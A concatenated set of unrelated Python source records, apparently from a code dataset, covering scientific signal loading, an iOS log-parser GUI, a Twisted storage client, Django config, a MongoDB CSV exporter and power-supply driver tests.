13,171 | 58cfa50ea0489ac8aec88cbc4052f93a4ca46321 | from abc import ABCMeta, abstractmethod
# BUG FIX: the original declared ``__metaclass__ = ABCMeta`` inside the class
# body, which only works on Python 2; on Python 3 it is silently ignored, so
# the @abstractmethod checks were never enforced. Instantiating the metaclass
# to build the base class works on both Python 2 and 3.
class Cost(ABCMeta('_CostBase', (object,), {})):
    """Abstract base class for cost functions of an optimal-control problem.

    Subclasses must implement both the running cost (``lagr``) and the
    terminal cost (``phi``); instantiating an incomplete subclass raises
    ``TypeError``.
    """

    @abstractmethod
    def lagr(self, x):
        """Running cost function (Lagrangian)

        :param x: state
        :return: running cost
        """
        return

    @abstractmethod
    def phi(self, x):
        """Terminal cost function

        :param x: state
        :return: terminal cost for state x
        """
        return
13,172 | e6a6207265e092509226fd3b714b92544ac1ceb5 | import h5py
import numpy as np
from os.path import dirname, realpath
from scipy.signal import butter, filtfilt, lfilter
from utils.filters import dc_blocker, magic_filter_taps
data_dir = dirname(dirname(dirname(realpath(__file__)))) + '/data/'
def load_feedback(ica_artifact=False, csp_alpha=False, signal_name='left'):
    """Load raw data and the derived feedback signal from the experiment HDF5 file.

    :param ica_artifact: if True, apply the first rejection matrix (ICA artifact)
    :param csp_alpha: if True, additionally apply the second rejection matrix (CSP alpha)
    :param signal_name: name of the derived signal whose stats/filters to load
    :return: tuple (data, spatially filtered signal, de-normalised derived signal)
    """
    with h5py.File(data_dir + 'experiment_data1.h5', 'r') as f:  # TODO: path
        protocol = 'protocol10'
        raw = f[protocol + '/raw_data'][:]
        print('Data was loaded from {} "{}"'.format(protocol, f[protocol].attrs['name']))
        signals_names = list(f[protocol + '/signals_stats'].keys())
        print(signals_names)
        derived = f[protocol + '/signals_data'][:][:, signals_names.index(signal_name)]
        _rejections_group = f[protocol + '/signals_stats/{}/rejections'.format(signal_name)]
        rejections = [_rejections_group['rejection{}'.format(k + 1)][:] for k in range(len(_rejections_group) // 2)]
        left_spatial_filter = f[protocol + '/signals_stats/{}/spatial_filter'.format(signal_name)][:]
        # BUG FIX: Dataset.value was deprecated and removed in h5py 3.0;
        # scalar datasets are read with ds[()] instead (works on h5py 2.x too).
        mean = f[protocol + '/signals_stats/{}/mean'.format(signal_name)][()]
        std = f[protocol + '/signals_stats/{}/std'.format(signal_name)][()]
        data = raw
        if ica_artifact:
            data = np.dot(data, rejections[0])
        if csp_alpha:
            data = np.dot(data, rejections[1])
        signal = np.dot(data, left_spatial_filter)
        print(left_spatial_filter)
        return data, signal, derived * std + mean
def get_ideal_signal(band = (8, 12), causal=False, causal_iir=True, b_order=4, min_phase=False):
    """Return the ICA-cleaned, DC-blocked data band-pass filtered in ``band``.

    :param band: (low, high) pass-band edges in Hz
    :param causal: use a causal (forward-only) filter instead of filtfilt
    :param causal_iir: with causal=True, use the Butterworth IIR; otherwise the FIR magic taps
    :param b_order: Butterworth filter order
    :param min_phase: short-circuit: filter with the minimum-phase magic filter
    """
    raw, _, _ = load_feedback(ica_artifact=True)
    raw = dc_blocker(raw)
    if min_phase:
        from utils.filters import min_phase_magic_filter
        return lfilter(min_phase_magic_filter(), 1.0, raw, axis=0)
    nyquist = 125
    num, den = butter(b_order, [band[0] / nyquist, band[1] / nyquist], 'band')
    if not causal:
        # Zero-phase (forward-backward) filtering.
        return filtfilt(num, den, raw, 0)
    if causal_iir:
        return lfilter(num, den, raw, axis=0)
    return lfilter(magic_filter_taps(), 1.0, raw, axis=0)
def get_signal():
    """Return DC-blocked raw data with the ICA artifact rejection applied."""
    raw, _, _ = load_feedback(ica_artifact=True)
    return dc_blocker(raw)
def get_signal_data():
    """Return (data, signal, derived) with both rejections applied and the
    data and spatially filtered signal DC-blocked."""
    raw, filtered, derived = load_feedback(ica_artifact=True, csp_alpha=True)
    return dc_blocker(raw), dc_blocker(filtered), derived
def load_normalised_raw_signal():
    """Return the spatially filtered signal standardised to zero mean, unit std."""
    _, sig, _ = get_signal_data()
    return (sig - sig.mean()) / sig.std()
13,173 | 5863b7b9a1f70f04e8eaa3abaec6f6113c4f2f61 | import argparse
import glob
import os
import re
import shutil
import sys
import tarfile
import webbrowser
from argparse import RawTextHelpFormatter
from tarfile import TarFile
from time import process_time
from zipfile import ZipFile
import PySimpleGUI as sg
from six.moves.configparser import RawConfigParser
from extraction import *
from ilapfuncs import *
from report import *
from search_files import *
from settings import report_folder_base
# All the stuff inside your window.
# PySimpleGUI theme and main-window layout. Fonts are set per widget; the
# Output element is the scrolling log pane, and the two Input/Browse rows
# let the user pick either a file (TAR/ZIP) or an extraction directory.
sg.theme("DarkAmber")  # Add a touch of color
layout = [
    [
        sg.Text("iOS Logs, Events, And Properties Parser.", font=("Helvetica", 25))
    ],  # added font type and font size
    [
        sg.Text("https://github.com/abrignoni/iLEAPP", font=("Helvetica", 18))
    ],  # added font type and font size
    [
        sg.Text(
            "Select a file (TAR, ZIP) or directory of the target iOS full file system extraction for parsing.",
            font=("Helvetica", 16),
        )
    ],  # added font type and font size
    [
        sg.Text("File:", size=(8, 1), font=("Helvetica", 14)),
        sg.Input(),
        sg.FileBrowse(font=("Helvetica", 12)),
    ],  # added font type and font size
    [
        sg.Text("Directory:", size=(8, 1), font=("Helvetica", 14)),
        sg.Input(),
        sg.FolderBrowse(font=("Helvetica", 12)),
    ],  # added font type and font size
    [
        sg.Checkbox(
            "Generate CSV output (Additional processing time)",
            size=(50, 1),
            default=False,
            font=("Helvetica", 14),
        )
    ],
    [sg.Output(size=(100, 40))],  # changed size from (88,20)
    [
        sg.Submit("Process", font=("Helvetica", 14)),
        sg.Button("Close", font=("Helvetica", 14)),
    ],
]  # added font type and font size
# Create the Window
# Event Loop to process "events" and get the "values" of the inputs
def gui_event_loop(window):
    """Run the GUI event loop: on "Process", extract, parse, optionally export
    CSV, show the report location, open it in a browser and exit.

    :param window: the PySimpleGUI window built from ``layout``
    """
    while True:
        event, values = window.read()
        if event in (None, "Close"):  # user closed window or clicked Close
            break
        # The file input takes precedence over the directory input.
        pathto = values["Browse"] or values["Browse0"]
        extracttype = get_filetype(pathto)
        start = process_time()
        log = pre_extraction(pathto, gui_window=window)
        extract_and_process(pathto, extracttype, tosearch, log, gui_window=window)
        post_extraction(start, extracttype, pathto)
        if values[2]:  # "Generate CSV output" checkbox
            csv_start = process_time()
            window.refresh()
            logfunc("")
            logfunc("CSV export starting. This might take a while...")
            window.refresh()
            html2csv(report_folder_base)
            # BUG FIX: elapsed time is end - start; the original computed
            # start - end and then wrapped it in abs().
            logfunc("CSV processing time in secs: " + str(process_time() - csv_start))
        locationmessage = "Report name: " + report_folder_base + "index.html"
        sg.Popup("Processing completed", locationmessage)
        basep = os.getcwd()
        # BUG FIX: the original referenced an undefined name ``base`` here,
        # which raised NameError. Matching ``locationmessage`` above, the
        # intent is to open the generated report index — this assumes
        # report_folder_base is relative to the CWD (TODO: confirm).
        webbrowser.open_new_tab("file://" + os.path.join(basep, report_folder_base, "index.html"))
        sys.exit()
|
13,174 | 806f251055c09ac604fa0a12c165da8b5f902232 | """
def decorator(func):
def decorated():
print('함수시작!')
func()
print('함수 끝!')
return decorated
@decorator
def hello_world():
print('hello_world')
hello_world()
"""
def decorator(area_func):
    """Wrap an area function so it rejects negative side lengths."""
    def decorated(x, y):
        # Guard clause: refuse negative inputs before delegating.
        if x < 0 or y < 0:
            raise ValueError("Input must be positive value")
        return area_func(x, y)
    return decorated
@decorator
def square_area(x, y):
    # Rectangle area: width * height (validated non-negative by decorator).
    return x * y
@decorator
def triangle_are(x, y):
    # Triangle area: base * height / 2.
    # NOTE(review): name is missing the trailing "a" ("triangle_area");
    # kept as-is because it is the public name used below.
    return (x * y) * 0.5
a = int(input(" a : "))
b = int(input(" b : "))
print(square_area(a,b))
print(triangle_are(a,b))
|
13,175 | 9ae7f0cadae040bfe49204bd9b5c971d55de6503 | #! /usr/bin/env python
# coding: utf8
#
# Moves the pan and tilt module and performs calculations to
# determine the distance and rotation to the edge of a desk.
import sys
import math
sys.path.insert(0, "../../lib/PiconZero/Python")
DEBUG = False
def getDistanceAndRotationToEdge(l, f, r):
    """Calculate the distance and rotation to the edge of the desk.

    l -- distance measured looking 45 degrees left (cm), or None if missing
    f -- distance measured looking straight ahead (cm)
    r -- distance measured looking 45 degrees right (cm), or None if missing

    Returns (distance, rotation): distance to the desk edge in whole cm and
    the signed rotation in whole degrees (negative = edge is to the left,
    0 = facing the edge directly).
    """
    if DEBUG:
        print "lfr:", l,",",f,",",r
    # Maths help from: http://xaktly.com/MathNonRightTrig.html
    #  - Specfically the law of cosines, but at least one of their
    #    examples is wrong, but methods are correct... sigh.
    #
    # For triangle with forward length, shortest of
    # left and right length, and desk edge as sides...
    #
    # f = forward distance length
    # l = left distance length
    # r = right distance length
    # e = length of desk edge between left and right views
    # s = shortest of left and right distance length
    # v = "view" angle of how much robot looks left or right
    # g = angle between f and e
    # d = distance between robot and edge of desk
    # a = angle between the way the robot is facing and edge of desk
    #     (i.e. if the robot is facing directly towards edge it's 0)
    #     (in radians or degrees?..)
    #
    # e² = f² + s² - 2 * f * s * cos(v)
    # g = sin⁻¹ * (s * sin(v) / e)
    # d = f * sin(g)
    # a = 180 - 90 - g (minus or positive depending on if s is left or right)
    # Figure out if the edge of the desk is more to the right or left
    # s = min(l, r) <-- Used to use this, but need additional things.
    # r | l | s
    # x | x | ?
    # 1 | 1 | ?     Logic table for _r_ight, _l_eft, and output
    # 0 | 0 | ?     _s_hortest distances from robot to desk edge
    # x | 0 | l
    # 1 | x | r     x = None
    # 0 | 1 | r     1 = arbitrary high-ish value
    # x | 1 | l     0 = arbitrary low-ish value
    # 1 | 0 | l
    # 0 | x | r
    # Distance to right and left are missing?
    if r is None and l is None:
        if DEBUG:
            print "INFO: Skipping edge calcs because of missing distances."
        # No side readings: assume edge is dead ahead at the forward distance.
        return int(round(f)), 0
    # Distance to right and left identical?
    elif r == l:
        if DEBUG:
            print "INFO: Skipping edge calcs because of identical distances."
        # This is unlikely-ish because l, f, r are floats...
        #
        #  r < f        r > f
        #    ◆    |  or   ◼
        # ____➘|        __🠛__
        #
        return int(round(min(r, f))), 0
    # Figure out if _l_eft or _r_ight is the shorter distance
    else:
        if r is None:
            s = l
            direction = -1
        elif l is None:
            s = r
            direction = 1
        elif l < r:
            s = l
            direction = -1
        elif r < l :
            s = r
            direction = 1
    # Law of cosines with the fixed 45° view angle, then law of sines to
    # recover the angle g, and finally the perpendicular distance d.
    cosV = math.cos(math.radians(45))
    sinV = math.sin(math.radians(45))
    e = f**2 + s**2 - 2 * f * s * cosV
    e = math.sqrt(e)
    g = math.degrees(math.asin(s * sinV / e))
    d = f * math.sin(math.radians(g)) # Switching degrees/radians f'debugging
    a = (90 - g) * direction
    '''
    # Debug stuff
    print "f =", f
    print "l =", l
    print "r =", r
    print "e =", e
    print "s =", s
    print "v =", 45
    print "g =", g
    print "d =", d
    print "a =", a
    '''
    distance = int(round(d))
    rotation = int(round(a))
    if DEBUG:
        print "Distance to edge:", str(distance) + "cm"
        print "Rotation to edge:", str(rotation) + "°"
    return distance, rotation
|
13,176 | 03ba7a367bde6dd33d033b762461f21c7b290441 | """
Twisted connection type.
See COPYING for license information
"""
from zope import interface
from object_storage.transport import requote_path
from object_storage.errors import NotFound
from object_storage.transport import Response, BaseAuthenticatedConnection, \
BaseAuthentication
from object_storage import errors
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.protocol import Protocol
from twisted.internet.ssl import ClientContextFactory
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
from twisted.web.iweb import IBodyProducer, UNKNOWN_LENGTH
import urlparse
import urllib
from object_storage.utils import json
def complete_request(resp, callback=None, load_body=True):
    """Convert a Twisted response into a Response object.

    resp      -- the twisted.web response
    callback  -- optional formatter applied to the finished Response
    load_body -- when False, return immediately without reading the body
                 (used for HEAD/DELETE requests)

    Returns either a Response (load_body=False) or a Deferred that fires
    with the Response once the full body has been delivered.
    Raises NotFound on 404 and the usual HTTP errors via raise_for_status().
    """
    r = Response()
    r.status_code = resp.code
    r.version = resp.version
    r.phrase = resp.phrase
    # Flatten multi-valued headers; pop() keeps the last raw value.
    for k, v in resp.headers.getAllRawHeaders():
        r.headers[k.lower()] = v.pop()
    if r.status_code == 404:
        raise NotFound('Not found')
    r.raise_for_status()
    if not load_body:
        if callback:
            return callback(r)
        return r
    def build_response(body):
        # Fired once FullBodyReader has buffered the whole body.
        r.content = body
        if callback:
            return callback(r)
        return r
    finished = Deferred()
    resp.deliverBody(FullBodyReader(finished))
    finished.addCallback(build_response)
    return finished
def print_error(failure):
    """Errback: print tracebacks for request-generation failures, then
    re-propagate the failure unchanged so later errbacks still see it."""
    from twisted.web import _newclient
    if failure.check(_newclient.RequestGenerationFailed):
        for f in failure.value.reasons:
            print f.getTraceback()
    return failure
class AuthenticatedConnection(BaseAuthenticatedConnection):
    """Connection wrapper that authenticates before issuing requests and
    injects the auth headers into every outgoing request."""
    def __init__(self, auth, **kwargs):
        self.token = None
        self.storage_url = None
        self.auth = auth
    def authenticate(self):
        # Delegate to the Authentication object, then finish local setup
        # (token/URL bookkeeping) once its Deferred fires.
        d = self.auth.authenticate()
        d.addCallback(lambda r: self._authenticate())
        return d
    def make_request(self, method, url=None, headers=None, *args, **kwargs):
        # Merge auth headers over the caller's headers, then call the
        # module-level make_request.
        headers = headers or {}
        headers.update(self.get_headers())
        return make_request(method, url=url, headers=headers, *args, **kwargs)
def make_request(method, url=None, headers=None, *args, **kwargs):
    """Make an HTTP request via a Twisted Agent.

    Recognized kwargs: formatter (callable applied to the Response),
    params (dict, urlencoded into the query string), data (request body,
    an IBodyProducer). Returns a Deferred firing with the (formatted)
    Response. HEAD/DELETE responses skip body loading.
    """
    # Twisted Headers wants a list of values per header name.
    headers = Headers(dict([(k, [v]) for k, v in headers.items()]))
    formatter = None
    if 'formatter' in kwargs:
        formatter = kwargs.get('formatter')
        del kwargs['formatter']
    if not formatter:
        # Identity formatter keeps the callback chain uniform.
        def _nothing(result):
            return result
        formatter = _nothing
    params = kwargs.get('params', None)
    if params:
        params = urllib.urlencode(params)
    url = _full_url(url, params)
    body = kwargs.get('data')
    # print method, url, headers, body
    contextFactory = WebClientContextFactory()
    agent = Agent(reactor, contextFactory)
    d = agent.request(
        method,
        url,
        headers,
        body)
    load_body = True
    if method.upper() in ['HEAD', 'DELETE']:
        load_body = False
    d.addCallback(complete_request, formatter, load_body=load_body)
    d.addErrback(print_error)
    return d
def _full_url(url, _params={}):
    """Build the actual URL to use.

    url     -- base URL; must include a scheme
    _params -- pre-urlencoded query string to append (empty dict/str = none;
               the mutable default is never mutated, so it is safe here)
    """
    # Support for unicode domain names and paths.
    scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
    if not scheme:
        raise ValueError("Invalid URL %r: No schema supplied" % url)
    netloc = netloc.encode('idna')
    if isinstance(path, unicode):
        path = path.encode('utf-8')
    path = requote_path(path)
    url = str(urlparse.urlunparse([scheme, netloc, path, params, query,
                                   fragment]))
    if _params:
        # Append with & if the URL already has a query string, else with ?.
        if urlparse.urlparse(url).query:
            return '%s&%s' % (url, _params)
        else:
            return '%s?%s' % (url, _params)
    else:
        return url
class Authentication(BaseAuthentication):
    """
    Swift-style authentication: exchanges username/api_key for an auth
    token and a storage URL via the X-Storage-User/X-Storage-Pass headers.
    """
    def __init__(self, username, api_key, auth_token=None, *args, **kwargs):
        super(Authentication, self).__init__(*args, **kwargs)
        self.username = username
        self.api_key = api_key
        self.auth_token = auth_token
        # A pre-supplied token short-circuits the authenticate() round trip.
        if self.auth_token:
            self.authenticated = True
    @property
    def auth_headers(self):
        # Headers to attach to authenticated requests.
        return {'X-Auth-Token': self.auth_token}
    def _authenticate(self, response):
        """Parse the auth response; populate auth_token and storage_url.

        Raises AuthenticationError on 401 or an incomplete response and
        StorageURLNotFound when the services JSON is missing/unparseable.
        """
        if response.status_code == 401:
            raise errors.AuthenticationError('Invalid Credentials')
        response.raise_for_status()
        try:
            storage_options = json.loads(response.content)['storage']
        except ValueError:
            raise errors.StorageURLNotFound("Could not parse services JSON.")
        self.auth_token = response.headers.get('x-auth-token', 'huh?')
        self.storage_url = self.get_storage_url(storage_options)
        if not self.storage_url:
            # NOTE(review): the fallback URL is assigned but the raise below
            # still aborts — the "Using default" wording suggests this was
            # meant to warn, not fail; confirm intended behavior.
            self.storage_url = response.headers['x-storage-url']
            raise errors.StorageURLNotFound("Could not find defined "
                                            "storage URL. Using default.")
        if not self.auth_token or not self.storage_url:
            raise errors.AuthenticationError('Invalid Authentication Response')
    def authenticate(self):
        """ Does authentication """
        headers = {'X-Storage-User': self.username,
                   'X-Storage-Pass': self.api_key,
                   'Content-Length': '0'}
        d = make_request('GET', self.auth_url, headers=headers)
        d.addCallback(self._authenticate)
        return d
class WebClientContextFactory(ClientContextFactory):
    """SSL context factory that ignores hostname/port, reusing one context
    for every connection (Twisted Agent API expects this signature)."""
    def getContext(self, hostname, port):
        return ClientContextFactory.getContext(self)
class FullBodyReader(Protocol):
    """Protocol that buffers an entire response body in memory and fires
    the given Deferred with it once the connection closes."""
    def __init__(self, finished):
        self.body = ''
        self.finished = finished
    def dataReceived(self, data):
        # Accumulate every delivered chunk into the buffer.
        self.body = self.body + data
    def connectionLost(self, reason):
        # Delivery complete (or aborted): hand the buffered body onward.
        self.finished.callback(self.body)
class ChunkedConnection:
    """
    Chunked Connection class.
    setup() will initiate a HTTP connection.
    send_chunk() will send more data.
    finish() will end the request.
    """
    def __init__(self, conn, url, headers=None, size=None):
        # conn    -- AuthenticatedConnection used to issue the PUT
        # url     -- target object URL
        # size    -- known content length, or None for chunked encoding
        self.conn = conn
        self.url = url
        self.req = None
        self.headers = headers
        self.started = Deferred()
        self.size = size
        self.body = ChunkedStreamProducer(self.started, self.size)
    def setup(self, size=None):
        """
        Sets up the connection. Will optionally accept a size or
        else will use a chunked Transfer-Encoding.
        """
        if size:
            self.size = size
        if not self.size:
            # UNKNOWN_LENGTH makes Twisted use chunked Transfer-Encoding.
            self.size = UNKNOWN_LENGTH
        self.body.length = self.size
        req = self.conn.make_request('PUT', self.url,
                                     headers=self.headers,
                                     data=self.body)
        self.req = req
        print "ChunkedTwistedConnection: STARTED REQUEST"
    def send_chunk(self, chunk):
        """ Sends a chunk of data. """
        print "ChunkedTwistedConnection: send chunk"
        return self.body.send(chunk)
    def finish(self):
        """ Finished the request out and receives a response. """
        self.body.finish()
class ChunkedStreamProducer(object):
    """IBodyProducer that lets callers push chunks into an in-flight
    request; writes are queued behind `started` until Twisted begins
    consuming the body."""
    interface.implements(IBodyProducer)
    def __init__(self, started, length=UNKNOWN_LENGTH):
        # NOTE(review): the `started` argument is ignored — a fresh
        # Deferred is created instead; confirm whether ChunkedConnection's
        # self.started was meant to be shared here.
        self.length = length
        self.consumer = None
        self.started = Deferred()
        self.finished = Deferred()
    def startProducing(self, consumer):
        # Called by Twisted when the request body may be written; releases
        # any send() calls queued on self.started.
        print "ChunkedStreamProducer: START PRODUCING"
        self.consumer = consumer
        self.started.callback(None)
        return self.finished
    def _send(self, result, data):
        print "ChunkedStreamProducer: _SEND"
        return self.consumer.write(data)
    def send(self, data):
        # Queue a chunk; it is written once production has started.
        print "ChunkedStreamProducer: SEND"
        d = Deferred()
        self.started.chainDeferred(d)
        d.addCallback(self._send, data)
        return d
    def finish(self):
        # Complete the body: fires `finished`, ending the request.
        def _finish(result):
            self.finished.callback(None)
            return None
        d = Deferred()
        self.started.chainDeferred(d)
        d.addCallback(_finish)
        return d
    def pauseProducing(self):
        print "pause"
        pass
    def stopProducing(self):
        print "STOP"
        pass
|
13,177 | ba0d1b42a84f79a9a88cda3796b0131321a198a1 | # Generated by Django 2.2.4 on 2020-05-04 16:33
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: widens/relabels Client.ClientEmail as a
    # 50-char EmailField ("E-mail"). Do not edit applied migrations.
    dependencies = [
        ('IT_company', '0043_auto_20200504_1920'),
    ]
    operations = [
        migrations.AlterField(
            model_name='client',
            name='ClientEmail',
            field=models.EmailField(max_length=50, verbose_name='E-mail'),
        ),
    ]
|
13,178 | e957c4d47cceeefabdfb5df33b20bb020de70c37 | # coding:utf-8
from MongoDb2Csv.MongoBaseDao import MongoBaseDao
import pandas as pd
class MongodbToCsv:
    """
    Read documents from MongoDB (optionally filtered, with deleted rows
    removed) and save the result as a CSV file.
    """
    def __init__(self):
        """
        Create the MongoDB access object shared by all queries.
        """
        self.__mongo = MongoBaseDao('192.168.65.119', 27017, 'spider')
    def read_delete_by_time_save_to_csv(self, col_name):
        """
        Read every document from the given collection and dump it to CSV.
        :param col_name: name of the collection to read from
        :return: None (writes the CSV file as a side effect)
        """
        self.__mongo.change_collection(col_name)
        # Fetch documents (empty filter = the entire collection).
        collection = self.__mongo.find_multi_info(filter_dict={}, return_dict=None)
        tmp_data_taken_out = pd.DataFrame(list(collection))  # convert to a DataFrame
        # self.__mongo.delete_info(list(collection)) # optionally delete by time
        # print(TmpData_taken_out)
        filepath = "H:\\Spider\\美术设计师2d3d.csv"
        tmp_data_taken_out.to_csv(filepath, sep=',')  # write the DataFrame as CSV
    @staticmethod
    def main():
        # Entry point: export one hard-coded collection.
        a = MongodbToCsv()
        a.read_delete_by_time_save_to_csv('美术设计师2d3d')
MongodbToCsv.main()
|
13,179 | 3543c4ec1b716982b767e768de03465c2f6bb5a4 | from dataset.citation import Citation
from dataset.hypergrad_mnist import *
|
13,180 | a2177f35916e534129ee3e2072bd6d3a4203d1f0 | t=input()
while(t>0):
t=t-1
s=raw_input()
r=s[::-1]
if r == s :
print "YES"
else:
print "NO" |
13,181 | e943a79a8a609cac970f8a4bebdfd98b5874aa52 | # -*- coding: utf-8 -*-
# vim: ft=python
"""
Pytest fixtures for all lfulib tests.
"""
# Import Python Libs.
from __future__ import absolute_import
from collections import deque
# Imports to others.
__all__ = []
# Shared LFU-cache test fixture: maps an access frequency to the deque of
# keys currently at that frequency (insertion order preserved).
FREQUENCY = {
    1: deque([2, 3]),
    2: deque([1]),
}
# Sentinel returned by cache lookups when a key is absent.
NOT_FOUND = -1
|
13,182 | 80c5a9f11ecbe590be0cc0620c2f9f275cc6d463 | """sonar URL Configuration"""
from django.conf.urls import url, include
from .views import qa_metrics_home, qa_metrics_api
# QA-metrics routes: a landing page plus an API endpoint taking a numeric
# project id and ISO-ish start/end datetime path segments.
urlpatterns = [
    url(r'^$', qa_metrics_home, name='qa_metrics_home'),
    url(r'^(?P<project_id>[0-9]+)/(?P<start_date>[0-9 + : T -]+)/(?P<end_date>[0-9 + : T -]+)/$', qa_metrics_api, name='qa_metrics_api'),
]
|
13,183 | 918faeb71dfaec234c46316302427fd6a6dd205f | import pytest
from hypothesis import given
from hypothesis.strategies import floats, data, sampled_from
from dp800.dp800 import DP832
@pytest.fixture
def instrument():
    """DP832 driver wired to a fake VISA backend (no hardware needed)."""
    # Imported lazily so the fake backend is only required when tests run.
    from test.fake_visa_dp832 import FakeVisaDP832
    visa_dp832 = FakeVisaDP832()
    dp832 = DP832(visa_dp832)
    return dp832
# --- Channel enumeration and output on/off state -------------------------
def test_channel_ids(instrument):
    # IDs must be consecutive integers.
    channel_ids = instrument.channel_ids
    assert all(channel_ids[i+1] == channel_ids[i] + 1 for i in range(len(instrument.channel_ids) - 1))
def test_channels(instrument):
    # channel(id) round-trips its own id.
    assert all(instrument.channel(id).id == id for id in instrument.channel_ids)
def test_channel_on(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.on()
        assert channel.is_on
def test_channel_off(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.off()
        assert not channel.is_on
def test_channel_is_on_on(instrument):
    # is_on is also writable as a property.
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.is_on = True
        assert channel.is_on
def test_channel_is_on_off(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.is_on = False
        assert not channel.is_on
# --- Setpoint and protection-level round-trips (property-based) ----------
# Each test draws a random channel and a random value within that
# channel's protection limits, rounded to the instrument's 1 mV/1 mA
# resolution, then checks the written value reads back unchanged.
@given(data=data())
def test_set_voltage_setpoint_level(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    voltage = data.draw(
        floats(channel.voltage.protection.min, channel.voltage.protection.max).map(
            lambda v: round(v, 3)))
    channel.voltage.setpoint.level = voltage
    assert channel.voltage.setpoint.level == voltage
@given(data=data())
def test_set_voltage_setpoint_step_increment(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    increment = data.draw(
        floats(channel.voltage.protection.min, channel.voltage.protection.max).map(  # TODO: Experimentally determine maximum
            lambda v: round(v, 3)))
    channel.voltage.setpoint.step.increment = increment
    assert channel.voltage.setpoint.step.increment == increment
@given(data=data())
def test_get_voltage_setpoint_step_default(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    # Factory default step is 1 mV.
    assert channel.voltage.setpoint.step.default == 0.001
@given(data=data())
def test_reset_voltage_setpoint_step_default(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    increment = data.draw(
        floats(channel.voltage.protection.min, channel.voltage.protection.max).map(  # TODO: Experimentally determine maximum
            lambda v: round(v, 3)))
    default = channel.voltage.setpoint.step.default
    channel.voltage.setpoint.step.increment = increment
    # reset() must restore the default regardless of the value written.
    channel.voltage.setpoint.step.reset()
    assert channel.voltage.setpoint.step.increment == default
@given(data=data())
def test_set_current_setpoint_level(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
    channel.current.setpoint.level = current
    assert channel.current.setpoint.level == current
@given(data=data())
def test_set_current_setpoint_step_increment(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    increment = data.draw(
        floats(channel.current.protection.min, channel.current.protection.max).map(  # TODO: Experimentally determine maximum
            lambda v: round(v, 3)))
    channel.current.setpoint.step.increment = increment
    assert channel.current.setpoint.step.increment == increment
@given(data=data())
def test_set_voltage_protection_level(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    voltage = data.draw(floats(channel.voltage.protection.min, channel.voltage.protection.max).map(lambda v: round(v, 3)))
    channel.voltage.protection.level = voltage
    assert channel.voltage.protection.level == voltage
@given(data=data())
def test_set_current_protection_level(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
    channel.current.protection.level = current
    assert channel.current.protection.level == current
# --- Measurements (values injected into the fake backend) and OVP/OCP ----
@given(data=data())
def test_voltage_measurement(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    voltage = data.draw(floats(channel.voltage.protection.min, channel.voltage.protection.max).map(lambda v: round(v, 3)))
    # Seed the fake instrument's reading, then read it back via the driver.
    instrument._inst._channel_voltage_measurements[channel_id] = voltage
    assert channel.voltage.measurement == voltage
@given(data=data())
def test_current_measurement(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
    instrument._inst._channel_current_measurements[channel_id] = current
    assert channel.current.measurement == current
@given(data=data())
def test_power_measurement(instrument, data):
    channel_id = data.draw(sampled_from(instrument.channel_ids))
    channel = instrument.channel(channel_id)
    voltage = data.draw(floats(channel.voltage.protection.min, channel.voltage.protection.max).map(lambda v: round(v, 3)))
    current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
    instrument._inst._channel_voltage_measurements[channel_id] = voltage
    instrument._inst._channel_current_measurements[channel_id] = current
    # Power is derived as V*I, rounded to the instrument's 3-digit display.
    assert channel.power.measurement == round(voltage*current, 3)
def test_voltage_protection_enabled(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.voltage.protection.enable()
        assert channel.voltage.protection.is_enabled
def test_voltage_protection_disabled(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.voltage.protection.disable()
        assert not channel.voltage.protection.is_enabled
def test_voltage_channel_is_enabled_enabled(instrument):
    # is_enabled is also writable as a property.
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.voltage.protection.is_enabled = True
        assert channel.voltage.protection.is_enabled
def test_voltage_channel_is_enabled_disabled(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.voltage.protection.is_enabled = False
        assert not channel.voltage.protection.is_enabled
def test_current_protection_enabled(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.current.protection.enable()
        assert channel.current.protection.is_enabled
def test_current_protection_disabled(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.current.protection.disable()
        assert not channel.current.protection.is_enabled
def test_current_channel_is_enabled_enabled(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.current.protection.is_enabled = True
        assert channel.current.protection.is_enabled
def test_current_channel_is_enabled_disabled(instrument):
    for channel_id in instrument.channel_ids:
        channel = instrument.channel(channel_id)
        channel.current.protection.is_enabled = False
        assert not channel.current.protection.is_enabled
|
